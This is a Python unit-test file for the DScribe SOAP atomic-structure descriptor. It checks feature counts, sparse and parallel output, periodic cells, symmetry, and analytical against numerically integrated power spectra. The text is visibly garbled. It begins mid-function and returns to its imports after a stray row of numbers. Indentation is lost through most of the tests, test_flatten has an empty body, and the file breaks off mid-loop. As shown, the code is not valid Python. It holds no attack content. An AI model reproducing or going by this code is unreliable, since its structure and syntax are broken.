        betas = sqrtm(np.linalg.inv(S))
        # Calculate the analytical power spectrum and the weights and decays of
        # the radial basis functions.
        soap = SOAP(species=species, lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, rbf="polynomial", crossover=True, sparse=False)
        analytical_power_spectrum = soap.create(system, positions=[[0, 0, 0]])[0]
        # Numerical expansion coefficients c_{Znlm}, filled below by direct
        # 3D integration in spherical coordinates
        coeffs = np.zeros((n_elems, nmax, lmax+1, 2*lmax+1))
        for iZ, Z in enumerate(elements):
            indices = np.argwhere(species == Z)[0]
            elem_pos = positions[indices]
            for n in range(nmax):
                for l in range(lmax+1):
                    for im, m in enumerate(range(-l, l+1)):
                        # Calculate numerical coefficients
                        # NOTE: the closure reads n, l and m late, but the
                        # integral is evaluated immediately below, before the
                        # loop variables advance, so the binding is safe.
                        def soap_coeff(phi, theta, r):
                            # Regular spherical harmonic, notice the abs(m)
                            # needed for constructing the real form
                            ylm_comp = scipy.special.sph_harm(np.abs(m), l, phi, theta) # NOTE: scipy swaps phi and theta
                            # Construct real (tesseral) spherical harmonics for
                            # easier integration without having to worry about
                            # the imaginary part. The real spherical harmonics
                            # span the same space, but are just computationally
                            # easier.
                            ylm_real = np.real(ylm_comp)
                            ylm_imag = np.imag(ylm_comp)
                            if m < 0:
                                ylm = np.sqrt(2)*(-1)**m*ylm_imag
                            elif m == 0:
                                ylm = ylm_comp
                            else:
                                ylm = np.sqrt(2)*(-1)**m*ylm_real
                            # Polynomial basis
                            poly = 0
                            for k in range(1, nmax+1):
                                poly += betas[n, k-1]*(rcut-np.clip(r, 0, rcut))**(k+2)
                            # Atomic density
                            rho = 0
                            for i_pos in elem_pos:
                                ix = i_pos[0]
                                iy = i_pos[1]
                                iz = i_pos[2]
                                ri_squared = ix**2+iy**2+iz**2
                                rho += np.exp(-1/(2*sigma**2)*(r**2 + ri_squared - 2*r*(np.sin(theta)*np.cos(phi)*ix + np.sin(theta)*np.sin(phi)*iy + np.cos(theta)*iz)))
                            # Jacobian
                            jacobian = np.sin(theta)*r**2
                            return poly*ylm*rho*jacobian
                        cnlm = tplquad(
                            soap_coeff,
                            r1,
                            r2,
                            lambda r: t1,
                            lambda r: t2,
                            lambda r, theta: p1,
                            lambda r, theta: p2,
                            epsabs=0.0001,
                            epsrel=0.0001,
                        )
                        integral, error = cnlm
                        coeffs[iZ, n, l, im] = integral
        # Calculate the partial power spectrum: only the unique
        # (zi <= zj, ni <= nj) combinations are stored
        numerical_power_spectrum = []
        for zi in range(n_elems):
            for zj in range(n_elems):
                for l in range(lmax+1):
                    for ni in range(nmax):
                        for nj in range(nmax):
                            if nj >= ni and zj >= zi:
                                value = np.dot(coeffs[zi, ni, l, :], coeffs[zj, nj, l, :])
                                prefactor = np.pi*np.sqrt(8/(2*l+1))
                                value *= prefactor
                                numerical_power_spectrum.append(value)
        # print("Numerical: {}".format(numerical_power_spectrum))
        # print("Analytical: {}".format(analytical_power_spectrum))
        self.assertTrue(np.allclose(numerical_power_spectrum, analytical_power_spectrum, atol=1e-15, rtol=0.01))
    def test_padding(self):
        """Tests that the padding used in constructing extended systems is
        sufficient.

        A noisy NiTi supercell is described first with an orthogonal unit
        cell and then with an equivalent monoclinic representation; the
        periodic SOAP output must agree for both, over a sweep of cell
        sizes, cutoffs and sigmas.
        """
        # Fix random seed for tests
        np.random.seed(7)
        # Loop over different cell sizes
        for ncells in range(1, 6):
            ncells = int(ncells)
            # Loop over different radial cutoffs
            for rcut in np.linspace(2, 10, 11):
                # Loop over different sigmas
                for sigma in np.linspace(0.5, 2, 4):
                    # Create descriptor generators
                    soap_generator = SOAP(
                        rcut=rcut, nmax=4, lmax=4, sigma=sigma, species=["Ni", "Ti"], periodic=True
                    )
                    # Define unit cell
                    a = 2.993
                    niti = Atoms(
                        "NiTi",
                        positions=[[0.0, 0.0, 0.0], [a / 2, a / 2, a / 2]],
                        cell=[a, a, a],
                        pbc=[1, 1, 1],
                    )
                    # Replicate system
                    niti = niti * ncells
                    a *= ncells
                    # Add some noise to positions
                    positions = niti.get_positions()
                    noise = np.random.normal(scale=0.5, size=positions.shape)
                    niti.set_positions(positions + noise)
                    niti.wrap()
                    # Evaluate descriptors for orthogonal unit cell
                    orthogonal_soaps = soap_generator.create(niti)
                    # Redefine the cubic unit cell as monoclinic
                    # with a 45-degree angle,
                    # this should not affect the descriptors
                    niti.set_cell([[a, 0, 0], [0, a, 0], [a, 0, a]])
                    niti.wrap()
                    # Evaluate descriptors for new, monoclinic unit cell
                    non_orthogonal_soaps = soap_generator.create(niti)
                    # Check that the relative or absolute error is small enough
                    self.assertTrue(np.allclose(orthogonal_soaps, non_orthogonal_soaps, atol=1e-8, rtol=1e-2))
if __name__ == '__main__':
    # Collect the SOAP tests and run them quietly.
    loader = unittest.TestLoader()
    full_suite = unittest.TestSuite([loader.loadTestsFromTestCase(SoapTests)])
    unittest.TextTestRunner(verbosity=0).run(full_suite)
| 37.631791 | 169 | 0.508127 |
import math
import unittest
import numpy as np
import scipy
import scipy.sparse
from scipy.integrate import tplquad
from scipy.linalg import sqrtm
from dscribe.descriptors import SOAP
from testbaseclass import TestBaseClass
from ase import Atoms
from ase.build import molecule
# Water molecule fixture: O at 0.95 from the first H, second H placed via a
# 76-degree angle (see the position expression), inside a 1x1x1 cell.
H2O = Atoms(
    cell=[
        [1.0, 0.0, 0.0],
        [0.0, 1.0, 0.0],
        [0.0, 0.0, 1.0]
    ],
    positions=[
        [0, 0, 0],
        [0.95, 0, 0],
        [0.95*(1+math.cos(76/180*math.pi)), 0.95*math.sin(76/180*math.pi), 0.0]
    ],
    symbols=["H", "O", "H"],
)
# Single hydrogen atom in a large 15x15x15 cell.
H = Atoms(
    cell=[
        [15.0, 0.0, 0.0],
        [0.0, 15.0, 0.0],
        [0.0, 0.0, 15.0]
    ],
    positions=[
        [0, 0, 0],
    ],
    symbols=["H"],
)
class SoapTests(TestBaseClass, unittest.TestCase):
def test_constructor(self):
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=5, sigma=0, nmax=5, lmax=5, periodic=True)
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=5, sigma=-1, nmax=5, lmax=5, periodic=True)
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=0.5, sigma=0, nmax=5, lmax=5, periodic=True)
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=0.5, sigma=0, nmax=5, lmax=10, rbf="gto", periodic=True)
with self.assertRaises(ValueError):
SOAP(species=["H", "O"], rcut=4, sigma=1, nmax=0, lmax=8, rbf="gto", periodic=True)
with self.assertRaises(ValueError):
a = SOAP(species=["H", "O"], rcut=10, sigma=0.5, nmax=12, lmax=8, rbf="polynomial", periodic=False)
a.create(H2O)
with self.assertRaises(ValueError):
a = SOAP(species=["H", "O"], rcut=10, sigma=0.5, nmax=20, lmax=8, rbf="gto", periodic=False)
a.create(H2O)
def test_properties(self):
a = SOAP(
species=[1, 8],
rcut=3,
nmax=3,
lmax=3,
sparse=False,
)
nfeat1 = a.get_number_of_features()
vec1 = a.create(H2O)
a.species = ["C", "H", "O"]
nfeat2 = a.get_number_of_features()
vec2 = a.create(molecule("CH3OH"))
self.assertTrue(nfeat1 != nfeat2)
self.assertTrue(vec1.shape[1] != vec2.shape[1])
def test_number_of_features(self):
lmax = 5
nmax = 5
n_elems = 2
desc = SOAP(species=[1, 8], rcut=5, nmax=nmax, lmax=lmax, periodic=True)
n_features = desc.get_number_of_features()
n_blocks = n_elems*(n_elems+1)/2
expected = int((lmax + 1) * nmax * (nmax + 1) / 2 * n_blocks)
self.assertEqual(n_features, expected)
n_features = desc.get_number_of_features()
vec = desc.create(H2O)
self.assertEqual(n_features, vec.shape[1])
def test_multiple_species(self):
lmax = 5
nmax = 5
species = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
desc = SOAP(species=species, rcut=5, nmax=nmax, lmax=lmax, periodic=False, sparse=False)
pos = np.expand_dims(np.linspace(0, 8, 8), 1)
pos = np.hstack((pos, pos, pos))
sys = Atoms(
symbols=species[0:8],
positions=pos,
pbc=False
)
vec1 = desc.create(sys)
sys2 = Atoms(
symbols=species[8:],
positions=pos,
pbc=False
)
vec2 = desc.create(sys2)
sys3 = Atoms(
symbols=species[4:12],
positions=pos,
pbc=False
)
vec3 = desc.create(sys3)
dot1 = np.dot(vec1[6, :], vec2[6, :])
dot2 = np.dot(vec1[3, :], vec3[3, :])
dot3 = np.dot(vec2[3, :], vec3[3, :])
self.assertTrue(abs(dot1) <= 1e-8)
self.assertTrue(abs(dot2) > 1e-3)
self.assertTrue(abs(dot3) > 1e-3)
def test_flatten(self):
def test_soap_structure(self):
lmax = 5
nmax = 5
desc = SOAP(species=[1, 8], rcut=5, nmax=nmax, lmax=lmax, periodic=True)
vec = desc.create(H2O)
self.assertTrue(vec.shape[0] == 3)
def test_sparse(self):
desc = SOAP(species=[1, 8], rcut=5, nmax=5, lmax=5, periodic=True, sparse=False)
vec = desc.create(H2O)
self.assertTrue(type(vec) == np.ndarray)
desc = SOAP(species=[1, 8], rcut=5, nmax=5, lmax=5, periodic=True, sparse=True)
vec = desc.create(H2O)
self.assertTrue(type(vec) == scipy.sparse.coo_matrix)
def test_positions(self):
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True,)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=False,)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=False,)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
with self.assertRaises(ValueError):
desc.create(H2O, positions=['a'])
def test_parallel_dense(self):
samples = [molecule("CO"), molecule("N2O")]
desc = SOAP(
species=[6, 7, 8],
rcut=5,
nmax=3,
lmax=3,
sigma=1,
periodic=False,
crossover=True,
average=False,
sparse=False,
)
n_features = desc.get_number_of_features()
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=1,
)
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = desc.create(samples[1], [0])
assumed[2, :] = desc.create(samples[1], [1])
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
)
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = desc.create(samples[1], [0])
assumed[2, :] = desc.create(samples[1], [1])
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[None, None],
n_jobs=2,
)
assumed = np.empty((2+3, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = desc.create(samples[0], [1])
assumed[2, :] = desc.create(samples[1], [0])
assumed[3, :] = desc.create(samples[1], [1])
assumed[4, :] = desc.create(samples[1], [2])
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[[[0, 0, 0], [1, 2, 0]], [[1, 2, 0]]],
n_jobs=2,
)
assumed = np.empty((2+1, n_features))
assumed[0, :] = desc.create(samples[0], [[0, 0, 0]])
assumed[1, :] = desc.create(samples[0], [[1, 2, 0]])
assumed[2, :] = desc.create(samples[1], [[1, 2, 0]])
self.assertTrue(np.allclose(output, assumed))
desc._average = True
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
)
assumed = np.empty((2, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = 1/2*(desc.create(samples[1], [0]) + desc.create(samples[1], [1]))
self.assertTrue(np.allclose(output, assumed))
def test_parallel_sparse(self):
samples = [molecule("CO"), molecule("N2O")]
desc = SOAP(
species=[6, 7, 8],
rcut=5,
nmax=3,
lmax=3,
sigma=1,
periodic=False,
crossover=True,
average=False,
sparse=True,
)
n_features = desc.get_number_of_features()
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=1,
).toarray()
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = desc.create(samples[1], [0]).toarray()
assumed[2, :] = desc.create(samples[1], [1]).toarray()
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
).toarray()
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = desc.create(samples[1], [0]).toarray()
assumed[2, :] = desc.create(samples[1], [1]).toarray()
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[None, None],
n_jobs=2,
).toarray()
assumed = np.empty((2+3, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = desc.create(samples[0], [1]).toarray()
assumed[2, :] = desc.create(samples[1], [0]).toarray()
assumed[3, :] = desc.create(samples[1], [1]).toarray()
assumed[4, :] = desc.create(samples[1], [2]).toarray()
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[[[0, 0, 0], [1, 2, 0]], [[1, 2, 0]]],
n_jobs=2,
).toarray()
assumed = np.empty((2+1, n_features))
assumed[0, :] = desc.create(samples[0], [[0, 0, 0]]).toarray()
assumed[1, :] = desc.create(samples[0], [[1, 2, 0]]).toarray()
assumed[2, :] = desc.create(samples[1], [[1, 2, 0]]).toarray()
self.assertTrue(np.allclose(output, assumed))
desc._average = True
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
).toarray()
assumed = np.empty((2, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = 1/2*(desc.create(samples[1], [0]).toarray() + desc.create(samples[1], [1]).toarray())
self.assertTrue(np.allclose(output, assumed))
def test_unit_cells(self):
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
molecule = H2O.copy()
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
nocell = desc.create(molecule, positions=[[0, 0, 0]])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True,)
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
with self.assertRaises(ValueError):
desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_pbc(True)
molecule.set_cell([
[20.0, 0.0, 0.0],
[0.0, 30.0, 0.0],
[0.0, 0.0, 40.0],
])
largecell = desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_cell([
[2.0, 0.0, 0.0],
[0.0, 2.0, 0.0],
[0.0, 0.0, 2.0]
])
cubic_cell = desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_cell([
[0.0, 2.0, 2.0],
[2.0, 0.0, 2.0],
[2.0, 2.0, 0.0]
])
triclinic_smallcell = desc.create(molecule, positions=[[0, 0, 0]])
def test_is_periodic(self):
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True,)
H2O.set_pbc(False)
nocell = desc.create(H2O, positions=[[0, 0, 0]])
H2O.set_pbc(True)
H2O.set_cell([
[2.0, 0.0, 0.0],
[0.0, 2.0, 0.0],
[0.0, 0.0, 2.0]
])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True)
cubic_cell = desc.create(H2O, positions=[[0, 0, 0]])
self.assertTrue(np.sum(cubic_cell) > 0)
def test_periodic_images(self):
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
molecule = H2O.copy()
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
nocell = desc.create(molecule, positions=[[0, 0, 0]])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True)
molecule.set_pbc(True)
molecule.set_cell([
[3.0, 0.0, 0.0],
[0.0, 3.0, 0.0],
[0.0, 0.0, 3.0]
])
cubic_cell = desc.create(molecule, positions=[[0, 0, 0]])
suce = molecule * (2, 1, 1)
cubic_suce = desc.create(suce, positions=[[0, 0, 0]])
molecule.set_cell([
[0.0, 2.0, 2.0],
[2.0, 0.0, 2.0],
[2.0, 2.0, 0.0]
])
triclinic_cell = desc.create(molecule, positions=[[0, 0, 0]])
suce = molecule * (2, 1, 1)
triclinic_suce = desc.create(suce, positions=[[0, 0, 0]])
self.assertTrue(np.sum(np.abs((nocell[:3] - cubic_suce[:3]))) > 0.1)
self.assertAlmostEqual(np.sum(cubic_cell[:3] - cubic_suce[:3]), 0)
self.assertAlmostEqual(np.sum(triclinic_cell[:3] - triclinic_suce[:3]), 0)
def test_symmetries(self):
def create_gto(system):
desc = SOAP(
species=system.get_atomic_numbers(),
rcut=8.0,
lmax=5,
nmax=5,
rbf="gto",
periodic=False,
crossover=True
)
return desc.create(system)
self.assertTrue(self.is_rotationally_symmetric(create_gto))
self.assertTrue(self.is_translationally_symmetric(create_gto))
def create_poly(system):
desc = SOAP(
species=system.get_atomic_numbers(),
rcut=8.0,
lmax=2,
nmax=1,
rbf="polynomial",
periodic=False,
crossover=True
)
return desc.create(system)
self.assertTrue(self.is_rotationally_symmetric(create_poly))
self.assertTrue(self.is_translationally_symmetric(create_poly))
def test_average(self):
sys = Atoms(symbols=["H", "C"], positions=[[-1, 0, 0], [1, 0, 0]], cell=[2, 2, 2], pbc=True)
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
average=True,
sparse=False
)
average = desc.create(sys)[0, :]
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
average=False,
sparse=False
)
first = desc.create(sys, positions=[0])[0, :]
second = desc.create(sys, positions=[1])[0, :]
assumed_average = (first+second)/2
self.assertTrue(np.array_equal(average, assumed_average))
def test_basis(self):
sys1 = Atoms(symbols=["H", "H"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys2 = Atoms(symbols=["O", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys3 = Atoms(symbols=["C", "C"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys4 = Atoms(symbols=["H", "C"], positions=[[-1, 0, 0], [1, 0, 0]], cell=[2, 2, 2], pbc=True)
sys5 = Atoms(symbols=["H", "C"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys6 = Atoms(symbols=["H", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys7 = Atoms(symbols=["C", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
sparse=False
)
vec1 = desc.create(sys1, positions=[[0, 0, 0]])[0, :]
vec2 = desc.create(sys2, positions=[[0, 0, 0]])[0, :]
vec3 = desc.create(sys3, positions=[[0, 0, 0]])[0, :]
vec4 = desc.create(sys4, positions=[[0, 0, 0]])[0, :]
vec5 = desc.create(sys5, positions=[[0, 0, 0]])[0, :]
vec6 = desc.create(sys6, positions=[[0, 0, 0]])[0, :]
vec7 = desc.create(sys7, positions=[[0, 0, 0]])[0, :]
dot = np.dot(vec1, vec2)
self.assertEqual(dot, 0)
dot = np.dot(vec2, vec3)
self.assertEqual(dot, 0)
dot = np.dot(vec4, vec5)
self.assertNotEqual(dot, 0)
n_elem_feat = desc.get_number_of_element_features()
h_part1 = vec1[0:n_elem_feat]
h_part2 = vec2[0:n_elem_feat]
h_part4 = vec4[0:n_elem_feat]
self.assertNotEqual(np.sum(h_part1), 0)
self.assertEqual(np.sum(h_part2), 0)
self.assertNotEqual(np.sum(h_part4), 0)
hc_part1 = vec1[1*n_elem_feat:2*n_elem_feat]
hc_part4 = vec4[1*n_elem_feat:2*n_elem_feat]
co_part6 = vec6[4*n_elem_feat:5*n_elem_feat]
co_part7 = vec7[4*n_elem_feat:5*n_elem_feat]
self.assertEqual(np.sum(hc_part1), 0)
self.assertNotEqual(np.sum(hc_part4), 0)
self.assertEqual(np.sum(co_part6), 0)
self.assertNotEqual(np.sum(co_part7), 0)
def test_rbf_orthonormality(self):
sigma = 0.15
rcut = 2.0
nmax = 2
lmax = 3
soap = SOAP(species=[1], lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, crossover=True, sparse=False)
alphas = np.reshape(soap._alphas, [10, nmax])
betas = np.reshape(soap._betas, [10, nmax, nmax])
nr = 10000
n_basis = 0
functions = np.zeros((nmax, lmax+1, nr))
for n in range(nmax):
for l in range(lmax+1):
gto = np.zeros((nr))
rspace = np.linspace(0, rcut+5, nr)
for k in range(nmax):
gto += betas[l, n, k]*rspace**l*np.exp(-alphas[l, k]*rspace**2)
n_basis += 1
functions[n, l, :] = gto
S = np.zeros((nmax, nmax))
l = 0
for l in range(lmax+1):
for i in range(nmax):
for j in range(nmax):
overlap = np.trapz(rspace**2*functions[i, l, :]*functions[j, l, :], dx=(rcut+5)/nr)
S[i, j] = overlap
diff = S-np.eye(nmax)
self.assertTrue(np.allclose(diff, np.zeros((nmax, nmax)), atol=1e-3))
    def test_gto_integration(self):
        """Tests that the gto power spectrum from the analytical implementation
        matches a brute-force numerical integration of the SOAP coefficients
        c_nlm over spherical coordinates.
        """
        # Descriptor parameters kept small so the triple integrals stay cheap.
        sigma = 0.55
        rcut = 2.0
        nmax = 2
        lmax = 2
        # Integration limits: radius (well past the cutoff), polar and
        # azimuthal angles.
        r1 = 0.
        r2 = rcut+5
        t1 = 0
        t2 = np.pi
        p1 = 0
        p2 = 2*np.pi
        # A tiny two-atom H/C system centered near the origin.
        positions = np.array([[0.0, 0.0, 0.0], [-0.3, 0.5, 0.4]])
        symbols = np.array(["H", "C"])
        system = Atoms(positions=positions, symbols=symbols)
        species = system.get_atomic_numbers()
        elements = set(system.get_atomic_numbers())
        n_elems = len(elements)
        # Reference output from the analytical implementation.
        soap = SOAP(species=species, lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, crossover=True, sparse=False)
        analytical_power_spectrum = soap.create(system, positions=[[0, 0, 0]])[0]
        # Internal gto basis coefficients, reshaped from their flattened
        # storage; the leading dimension of 10 is the implementation's fixed
        # l-grid size (assumed — confirm against the dscribe source).
        alphagrid = np.reshape(soap._alphas, [10, nmax])
        betagrid = np.reshape(soap._betas, [10, nmax, nmax])
        # Numerically integrated expansion coefficients c_{Z,n,l,m}.
        coeffs = np.zeros((n_elems, nmax, lmax+1, 2*lmax+1))
        for iZ, Z in enumerate(elements):
            indices = np.argwhere(species == Z)[0]
            elem_pos = positions[indices]
            for n in range(nmax):
                for l in range(lmax+1):
                    for im, m in enumerate(range(-l, l+1)):
                        # Integrand g_nl(r) * Y_lm * rho_Z * Jacobian in
                        # spherical coordinates, using real spherical
                        # harmonics built from scipy's complex ones.
                        def soap_coeff(phi, theta, r):
                            # Spherical harmonic; scipy's convention is
                            # sph_harm(m, l, azimuth, polar).
                            ylm_comp = scipy.special.sph_harm(np.abs(m), l, phi, theta)
                            ylm_real = np.real(ylm_comp)
                            ylm_imag = np.imag(ylm_comp)
                            # Real form of the spherical harmonics.
                            if m < 0:
                                ylm = np.sqrt(2)*(-1)**m*ylm_imag
                            elif m == 0:
                                ylm = ylm_comp
                            else:
                                ylm = np.sqrt(2)*(-1)**m*ylm_real
                            # Radial basis function g_nl(r) as a sum of
                            # primitive gaussians.
                            gto = 0
                            for i in range(nmax):
                                i_alpha = alphagrid[l, i]
                                i_beta = betagrid[l, n, i]
                                i_gto = i_beta*r**l*np.exp(-i_alpha*r**2)
                                gto += i_gto
                            # Gaussian-broadened atomic density of this
                            # element evaluated at (r, theta, phi).
                            rho = 0
                            for i_pos in elem_pos:
                                ix = i_pos[0]
                                iy = i_pos[1]
                                iz = i_pos[2]
                                ri_squared = ix**2+iy**2+iz**2
                                rho += np.exp(-1/(2*sigma**2)*(r**2 + ri_squared - 2*r*(np.sin(theta)*np.cos(phi)*ix + np.sin(theta)*np.sin(phi)*iy + np.cos(theta)*iz)))
                            # Volume element for spherical coordinates.
                            jacobian = np.sin(theta)*r**2
                            return gto*ylm*rho*jacobian
                        # Triple integral over r, theta, phi.
                        cnlm = tplquad(
                            soap_coeff,
                            r1,
                            r2,
                            lambda r: t1,
                            lambda r: t2,
                            lambda r, theta: p1,
                            lambda r, theta: p2,
                            epsabs=0.001,
                            epsrel=0.001,
                        )
                        integral, error = cnlm
                        coeffs[iZ, n, l, im] = integral
        # Assemble the power spectrum p_{Z1 Z2, n1 n2, l} from the numerical
        # coefficients, keeping only the unique (upper-triangular) entries in
        # the same order as the analytical implementation.
        numerical_power_spectrum = []
        for zi in range(n_elems):
            for zj in range(n_elems):
                for l in range(lmax+1):
                    for ni in range(nmax):
                        for nj in range(nmax):
                            if nj >= ni:
                                if zj >= zi:
                                    value = np.dot(coeffs[zi, ni, l, :], coeffs[zj, nj, l, :])
                                    prefactor = np.pi*np.sqrt(8/(2*l+1))
                                    value *= prefactor
                                    numerical_power_spectrum.append(value)
        self.assertTrue(np.allclose(numerical_power_spectrum, analytical_power_spectrum, atol=1e-15, rtol=0.01))
    def test_poly_integration(self):
        """Tests that the polynomial power spectrum from the analytical
        implementation matches a brute-force numerical integration of the
        SOAP coefficients c_nlm over spherical coordinates.
        """
        # Descriptor parameters kept small so the triple integrals stay cheap.
        sigma = 0.55
        rcut = 2.0
        nmax = 2
        lmax = 2
        # Integration limits: radius (well past the cutoff), polar and
        # azimuthal angles.
        r1 = 0.
        r2 = rcut+5
        t1 = 0
        t2 = np.pi
        p1 = 0
        p2 = 2*np.pi
        # A tiny two-atom H/C system centered near the origin.
        positions = np.array([[0.0, 0.0, 0.0], [-0.3, 0.5, 0.4]])
        symbols = np.array(["H", "C"])
        system = Atoms(positions=positions, symbols=symbols)
        species = system.get_atomic_numbers()
        elements = set(system.get_atomic_numbers())
        n_elems = len(elements)
        # Overlap matrix of the raw polynomial basis (rcut - r)^(n+2); the
        # closed form follows from integrating the product with the r^2
        # volume element over [0, rcut].
        S = np.zeros((nmax, nmax))
        for i in range(1, nmax+1):
            for j in range(1, nmax+1):
                S[i-1, j-1] = (2*(rcut)**(7+i+j))/((5+i+j)*(6+i+j)*(7+i+j))
        # Loewdin orthogonalization: betas = S^(-1/2).
        betas = sqrtm(np.linalg.inv(S))
        # Reference output from the analytical implementation.
        soap = SOAP(species=species, lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, rbf="polynomial", crossover=True, sparse=False)
        analytical_power_spectrum = soap.create(system, positions=[[0, 0, 0]])[0]
        # Numerically integrated expansion coefficients c_{Z,n,l,m}.
        coeffs = np.zeros((n_elems, nmax, lmax+1, 2*lmax+1))
        for iZ, Z in enumerate(elements):
            indices = np.argwhere(species == Z)[0]
            elem_pos = positions[indices]
            for n in range(nmax):
                for l in range(lmax+1):
                    for im, m in enumerate(range(-l, l+1)):
                        # Integrand g_n(r) * Y_lm * rho_Z * Jacobian in
                        # spherical coordinates, using real spherical
                        # harmonics built from scipy's complex ones.
                        def soap_coeff(phi, theta, r):
                            # Spherical harmonic; scipy's convention is
                            # sph_harm(m, l, azimuth, polar).
                            ylm_comp = scipy.special.sph_harm(np.abs(m), l, phi, theta)
                            ylm_real = np.real(ylm_comp)
                            ylm_imag = np.imag(ylm_comp)
                            # Real form of the spherical harmonics.
                            if m < 0:
                                ylm = np.sqrt(2)*(-1)**m*ylm_imag
                            elif m == 0:
                                ylm = ylm_comp
                            else:
                                ylm = np.sqrt(2)*(-1)**m*ylm_real
                            # Orthonormalized polynomial radial basis; the
                            # clip makes the basis vanish beyond the cutoff.
                            poly = 0
                            for k in range(1, nmax+1):
